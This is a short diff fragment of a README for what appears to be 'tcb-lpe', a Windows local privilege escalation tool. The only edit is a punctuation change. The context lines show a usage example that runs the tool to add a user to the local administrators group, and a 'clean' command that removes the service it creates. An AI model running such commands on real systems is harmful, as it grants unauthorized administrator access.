CharminDoge/tcb-lpe/README.md

 .\tcb.exe "C:\Windows\system32\cmd.exe /c net localgroup administrators tcb_user /add"
 ```

 The service is deleted automatically after program execution.
-To delete it manually, you can use the "clean" command:
+To delete it manually, you can use the "clean" command.
 ```batch
 .\tcb.exe clean
 ```